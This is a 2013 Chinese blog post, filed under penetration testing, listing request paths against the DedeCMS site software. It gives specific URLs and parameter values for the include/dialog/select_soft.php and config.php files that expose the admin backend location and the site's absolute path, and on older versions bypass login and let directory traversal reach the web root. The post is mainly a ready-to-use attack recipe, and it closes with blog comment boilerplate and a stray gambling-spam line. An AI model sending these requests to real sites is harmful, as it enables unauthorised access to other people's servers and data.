?

Apr 13 2013

dedecms爆后臺文件技巧

首頁 » 滲透測試 » dedecms爆后臺文件技巧   

1.include/dialog/select_soft.php文件可以爆出DEDECMS的后臺,以前的老板本可以跳過登陸驗證直接訪問,無需管理
 
員帳號,新版本的就直接轉向了后臺.
 
2.include/dialog/config.php會爆出后臺管理路徑
 
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳轉目錄
 
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出網站絕對路徑.
 
5.另外一些低版本的DEDECMS訪問這個頁面的時候會直接跳過登陸驗證,直接顯示,而且還可以用/././././././././掉
 
到根目錄去.不過這些版本的訪問地址有些不同.
地址為require/dialog/select_soft.php?activepath=/././././././././
 
include\dialog\目錄下的另外幾個文件都存在同一個問題,只是默認設的目錄不同.有些可以查看HTML這些文件哦..
存在相同問題的文件還有
include\dialog\select_images.php
include\dialog\select_media.php
include\dialog\select_templets.php?
http://www.2cto.com/Article/201304/201778.html
正文部分到此結束

文章標簽: dedecms 爆后臺 文件技巧

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «java環境變量設置 | 非你莫屬20130407 4號求職者 這個二貨笑死我»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖